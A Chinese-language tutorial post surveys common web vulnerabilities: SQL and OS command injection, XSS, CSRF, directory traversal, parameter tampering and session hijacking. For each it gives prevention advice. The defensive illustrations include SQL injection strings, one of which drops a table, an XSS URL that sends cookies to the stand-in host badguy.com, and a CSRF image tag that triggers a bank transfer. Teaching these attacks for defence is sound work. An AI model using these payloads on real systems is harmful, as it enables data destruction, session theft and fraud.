`

Web的脆弱性:各种注入、攻击

 
阅读更多
SQL注入
所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
通过一下的例子更形象的了解SQL注入:
有一个Login画面,在这个Login画面上有两个文本框分别用来输入用户名和密码,当用户点了登录按钮的时候,会对输入的用户名和密码进行验证。验证的SQL语句如下:
       select * from student where username='输入的用户名' and password='输入的密码' 
如果能够检索到数据,说明验证通过,否则验证不通过。

如果用户在用户名文本框中输入 ' or '1' = '1' or '1' = '1,则验证的SQL语句变成:

      select * from student where username='' or '1' = '1' or '1' = '1' and password='' 

如果用户在密码文本框中输入 1' or '1' = '1,则验证的SQL语句变成:

  select * from student where username='' and password='1' or '1'='1' 

以上两个SQL语句的where条件永远是成立的,所以验证永远是有效的。

如果在用户名文本框中输入  tom' ; drop table student-- ,则SQL语句变成:
[sql] view plaincopyprint?
1.       select * from student where username='tom' ; drop table student--' and password='' 
这样就变成的两条SQL语句,执行完查询操作,接着直接把student表给删除了(双连接符表示注释)
如何防止SQL注入:
1.       永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双"-"进行转换等。
2.       永远不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取
3.       永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接
4.       不要把机密信息直接存放,加密或者hash掉密码和敏感的信息
5.       应用的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装
6.       采用一些工具或网络平台检测是否存在SQL注入
OS命令注入
OS命令注入和SQL注入差不多,只不过SQL注入是针对数据库的,而OS命令注入是针对操作系统的。OS命令注入即能够在服务器上执行任意命令。
如何防止OS命令注入:
1.       不要调用外部程序。举个例子,在UNIX系统上,有一个叫CGI的程序,可以执行sendmail命令来发送邮件。也许你的web应用程序也有发送邮件的功能,通过直接调用CGI程序发送邮件非常的简单,但是不要这样做,因为在执行sendmail命令的同时,也会混杂进其他OS命令,正确的做法是使用发送邮件的library。
2.       过滤调 、; ,[ ,] ,| ,< ,> ,\ 之类的符号
3.       设置用户的权限
XSS跨站脚本攻击
XSS跨站脚本攻击指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的,比如获取用户的Cookie,导航到恶意网站,携带木马等。
XSS攻击场景有以下两个方面:
1. Dom-Based XSS 漏洞。攻击过程如下
Tom 发现了Victim.com中的Search.asp页面有XSS漏洞,Search.asp的代码如下:

1.       <html> 
2.         <title></title> 
3.         <body> 
4.           Results  for  <%Reequest.QueryString("term")%> 
5.           ... 
6.         </body> 
7.       </html> 
Tom 先建立一个网站http://badguy.com,用来接收“偷”来的信息。然后Tom 构造一个恶意的url(如下),通过某种方式(邮件,QQ)发给Monica
http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
Monica点击了这个URL,嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行,那么Monica在victim.com网站的cookie,就会被发送到badguy网站中,这样Monica在victim.com 的信息就被Tom盗了
2. Stored XSS(存储式XSS漏洞)。该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下
Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,于是Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走
Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户。
如何防止XSS跨站脚本攻击:
原则:不相信用户输入的数据
注意:攻击代码不一定在<script></script>中
1.       将重要的cookie标记为http only,这样的话Javascript 中的document.cookie语句就不能获取到cookie了
2.       只允许用户输入我们期望的数据。例如:年龄的textbox中,只允许用户输入数字,而数字之外的字符都过滤掉
3.       对数据进行Html Encode 处理。< 转化为 &lt;、> 转化为 &gt;、& 转化为 &amp;、' 转化为 &#039;、" 转化为 &quot;、空格 转化为 &nbsp;
4.       过滤或移除特殊的Html标签。例如:<script>、<iframe>、&lt; for <、&gt; for >、&quot for
5.       过滤JavaScript 事件的标签。例如 "onclick="、"onfocus" 等等
很多浏览器都加入了安全机制来过滤XSS(如下图,在ie中输入http://www.baidu.com/s?wd=<script>alert(document.cookie)</script>)

CSRF跨站请求伪造
CSRF(XSRF)尽管听起来很想XSS跨站脚本攻击,但是它于XSS完全不同。XSS是利用站点内的信任用户,而CSRF则是通过伪装来自受信任用户的请求来利用受信任的站点。
与XSS相比,CSRF攻击不大流行和难以防范,所以比XSS更具危险性。
以下是一个CSRF的例子
受害者 Bob 在银行有一笔存款,通过对银行的网站发送请求http://bank.example/withdraw?account=bob&amount=1000000&for=bob2可以使 Bob 把 1000000 的存款转到 bob2 的账号下。通常情况下,该请求发送到网站后,服务器会先验证该请求是否来自一个合法的 session,并且该 session 的用户 Bob 已经成功登陆。
黑客 Mallory 自己在该银行也有账户,他知道上文中的 URL 可以把钱进行转帐操作。Mallory 可以自己发送一个请求给银行:http://bank.example/withdraw?account=bob& amount=1000000&for=Mallory。但是这个请求来自 Mallory 而非 Bob,他不能通过安全认证,因此该请求不会起作用。
这时,Mallory 想到使用 CSRF 的攻击方式,他先自己做一个网站,在网站中放入如下代码:<img src=”http://bank.example/withdraw?account=bob&amount=1000000&for=Mallory” />。并且通过广告等诱使 Bob 来访问他的网站。当 Bob 访问该网站时,上述 url 就会从 Bob 的浏览器发向银行,而这个请求会附带 Bob 浏览器中的 cookie 一起发向银行服务器。大多数情况下,该请求会失败,因为他要求 Bob 的认证信息。但是,如果 Bob 当时恰巧刚访问他的银行后不久,他的浏览器与银行网站之间的 session 尚未过期,浏览器的 cookie 之中含有 Bob 的认证信息。这时,悲剧发生了,这个 url 请求就会得到响应,钱将从 Bob 的账号转移到 Mallory 的账号,而 Bob 当时毫不知情。等以后 Bob 发现账户钱少了,即使他去银行查询日志,他也只能发现确实有一个来自于他本人的合法请求转移了资金,没有任何被攻击的痕迹。而 Mallory 则可以拿到钱后逍遥法外。
如何防止CSRF跨站请求伪造:
1.       对于web站点,将持久化的授权方法(例如cookie或者HTTP授权)切换为瞬时的授权方法(在每个form中提供隐藏field)。
2.       “双提交”cookie。此方法只工作于Ajax请求,但它能够作为无需改变大量form的全局修正方法。如果某个授权的cookie在form post之前正被JavaScript代码读取,那么限制跨域规则将被应用。什么叫限制跨域规则呢?限制跨域规则就是:如果服务器需要在Post请求体或者URL中包含授权cookie的请求,那么这个请求必须来自于受信任的域,因为其它域是不能从信任域读取cookie的。上面那个例子的受信任域就是银行网站的某个域,而Mallory发给Bob的链接不是受信任的域。
3.       使用Post代替Get。Post方式不会在web服务器和代理服务器日志中留下数据尾巴,然而Get方式却会留下数据尾巴。
4.       以上三点都是正对web站点的防御手段,第4点是从用户的角度的防御手段。通过在浏览其它站点前登出站点或者在浏览器会话结束后清理浏览器的cookie来防止CSRF攻击。
目录遍历漏洞
目录遍历漏洞在国内外有不同的叫法(信息泄露漏洞、非授权文件包含漏洞、等等)。目录遍历漏洞就是在程序中没有过滤用户输入的../和./之类的目录跳转符,导致恶意用户可以通过提交目录跳转来遍历服务器上的任意文件,其危害可想而知。
如何防止目录遍历漏洞:
1.       权限控制
2.       对包含了恶意的符号或者空字节进行拒绝
3.       使用绝对路径+参数来控制访问目录,使其即使是越权或者跨越目录也是在指定的目录下
参数篡改
参数值窜改是网络攻击的一种形式,其中在URL中的某些参数或由用户输入的网页形式领域数据都在没有得到用户授权的情况下改变了。这导致浏览器指向一个不是用户想去的链接、网页或网站(尽管对随机观测者来说它们看上去几乎一样)。参数值篡改被犯罪者用来获取个人或商业信息。
如何防止参数篡改:
1.       对所有参数值进行验证
2.       根据session id进行迁移,参数使用服务器端的值
会话劫持
会话劫持就是在一次正常的会话过程当中,攻击者作为第三方参与到其中,他可以在正常数据包中插入恶意数据,也可以在双方的会话当中进行监听,甚至可以是代替某一方主机接管会话。
我们可以把会话劫持攻击分为两种类型:1)中间人攻击(Man In The Middle,简称MITM),2)注射式攻击(Injection)
中间人攻击:简而言之,所谓的MITM攻击就是通过拦截正常的网络通信数据,并进行数据篡改和嗅探,而通信的双方却毫不知情
注射式攻击:这种方式的会话劫持比中间人攻击实现起来简单一些,它不会改变会话双方的通讯流,而是在双方正常的通讯流插入恶意数据
还可以把会话劫持攻击分为两种形式:1)被动劫持,2)主动劫持
被动劫持:在后台监视双方会话的数据流,丛中获得敏感数据
主动劫持:将会话当中的某一台主机“踢”下线,然后由攻击者取代并接管会话,这种攻击方法危害非常大,攻击者可以做很多事情
如何防止会话劫持:
1.       限制入网的连接
2.       设置你的网络拒绝假冒本地地址从互联网上发来的数据包
3.       加密也是有帮助的。FTP和Telnet协议是最容易受到攻击的。SSH是一种很好的替代方法
分享到:
评论

相关推荐

    SQL注入攻击与防御.pdf

    由于Web应用广泛依赖数据库存储和处理数据,所以它们对SQL注入攻击尤为脆弱。 随着Web应用的普及和互联网技术的发展,SQL注入攻击变得越来越复杂和隐蔽。攻击者不断开发出新的攻击工具和技术,对网站管理员和开发...

    基于Web应用的SQL注入攻击和防御技术研究_韩继英.pdf

    2. 探测和确认:尝试不同的SQL代码片段,确定Web应用是否对SQL注入攻击脆弱。 3. 数据提取:利用注入漏洞,执行数据库查询,获取敏感信息,比如用户数据、系统配置等。 4. 数据篡改:在取得了一定权限后,攻击者可能...

    Web应用安全:Burpsuite工具介绍.pptx

    Burp Suite 是一款集成化的 Web 应用安全测试工具,由 Java 开发,具备跨平台性,主要用于协助安全专业人员进行渗透测试和攻击模拟。它集成了多种功能模块,使测试过程更加高效且灵活。 1. **Burp Target**:此模块...

    Web页面中SQL注入攻击过程及防御措施.pdf

    SQL注入攻击是网络安全领域中的一个严重威胁,尤其在Web应用程序中。这种攻击方式利用了开发者在编写动态SQL语句时的疏忽,使得攻击者能够通过输入恶意代码,篡改数据库查询,获取敏感信息,甚至破坏整个数据库系统...

    Web应用程序中SQL注入攻防策略的研究.pdf

    本文围绕Web应用程序中的SQL注入攻击问题,系统地探讨了其攻击原理、特点、攻击过程以及防御策略,旨在为Web应用开发人员提供参考与指导,增强应用程序的安全性。 SQL注入攻击,即Structured Query Language ...

    信息安全技术基础:对MySQL数据库进行SQL注入攻击.pdf

    实验目的是为了让学生理解SQL注入的基本手段,了解Web站点的脆弱性,并学习如何修复SQL注入漏洞。实验环境包括Windows客户端和服务器端,使用Apache、PHP和MySQL搭建的环境。实验工具主要为IE浏览器,用于模拟攻击...

    Web应用安全:Sqlmap用法介绍.pptx

    Damn Vulnerable Web Application (DVWA)是一个专门为安全专业人士和Web开发者设计的安全脆弱性演示平台。下载并解压DVWA的.zip文件至phpStudy的WWW目录下,修改config.inc.php中的默认密码为"root"。访问...

    信息安全技术基础:对MySQL数据库进行SQL注入攻击.docx

    实验目的是理解SQL注入的基本方法,发现Web站点的脆弱性,并学习如何修复SQL注入漏洞。实验步骤包括了解PHP+MySQL架构的应用,熟悉SQL语句,模拟攻击并分析结果,以及探索如何构建安全的PHP代码。 【防范措施】 ...

    命令注入讲解ppt.pptx

    DVWA 是一个用来进行安全脆弱性鉴定的 PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助 web 开发者更好的理解 web 应用安全防范的过程。同时是一个开源项目。其中 Command ...

    WebRobot注入工具

    它能尝试各种注入技术,如盲注、时间延迟注入、错误注入等,从而找出网站数据库的脆弱点,帮助管理员及时修复,提升网站安全性。 二、获取网站目录 WebRobot不仅仅关注SQL注入,还具备探测网站目录结构的能力。通过...

    Web应用安全:Sqlmap用法介绍(实验).docx

    DVWA是一个用于安全教育的开源Web应用,它包含了各种常见的安全漏洞,如SQL注入。在实验中,先是从GitHub上下载DVWA的源代码,解压后将其放在phpStudy的WWW目录下,然后通过修改配置文件(config.inc.php)设置...

    Web应用安全威胁与防治+基于OWASP+Top+10与ESAPI.pdf

    1. 注入攻击:如SQL注入、命令注入等,攻击者通过恶意输入执行未授权的数据库查询或操作系统命令。 2. 不安全的身份验证:弱密码策略、会话管理不当等可能导致用户身份被冒用。 3. 敏感数据泄露:包括信用卡号、个人...

    明小子注入教程明小子注入教程

    总之,"明小子注入教程"是一个全面的课程,旨在帮助网络安全从业者和爱好者了解并掌握SQL注入攻击与防御技术,通过明小子这一工具,深入理解数据库安全的脆弱性和保护措施。通过学习这个教程,你可以提升自己的安全...

    PHP注入工具超强工具包

    2. **payload生成器**:可以生成各种可能的恶意输入,帮助测试者构建特定的注入攻击。 3. **日志分析器**:用于收集和分析服务器日志,寻找可能的注入迹象。 4. **数据库枚举工具**:通过注入漏洞获取数据库结构、...

    ASP.NET中如何防范SQL注入式攻击

     所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入...

    系统安全培训Web安全性.pptx

    【系统安全培训Web安全性】是关于网络安全性的一个专题,尤其关注了三个主要的安全问题:SQL注入、上传文件漏洞和XSS跨站脚本攻击。...有效的安全策略可以显著降低系统的脆弱性,保护用户数据和系统资源不受损害。

    WEB渗透测试入门.rar

    2. XSS攻击:通过在网页上插入恶意脚本,攻击者可以窃取用户的Cookie或其他敏感信息。 3. 文件包含漏洞:允许攻击者通过修改文件包含函数的参数,引入远程或本地文件,可能导致代码执行。 4. SSRF(Server-Side ...

    天融信网站脆弱性扫描平台白皮书.pdf

    天融信网站脆弱性扫描系统(WEB扫描系统)是天融信技术研究团队通过深入研究当前流行的Web攻击手段而研发的一款产品。它集成了本地检测和远程检测技术,对网站进行全面的风险评估,以发现可能存在的弱点和漏洞。 2....

    dvws:该死的易受攻击的Web服务是一个不安全的Web应用程序,具有多个易受攻击的Web服务组件,可用于了解现实世界中的Web服务漏洞。 笔记

    该死的脆弱的Web服务 注意:该项目已过时,请使用 该死的易受攻击的Web服务是一个不安全的Web应用程序,具有多个易受攻击的Web服务组件,可用于了解现实世界中的Web服务漏洞。 该项目的目的是通过使用实际的实验室...

    Web-Attack&Google; Hacker原稿

    2. Google Dorks:特定的搜索语法,用于定位特定类型的脆弱性,如"filetype:pdf password"可能找到公开的PDF密码文件。 3. 链接分析:通过分析网站之间的链接关系,找出可能的内部链接或未公开的页面,帮助发现潜在...

Global site tag (gtag.js) - Google Analytics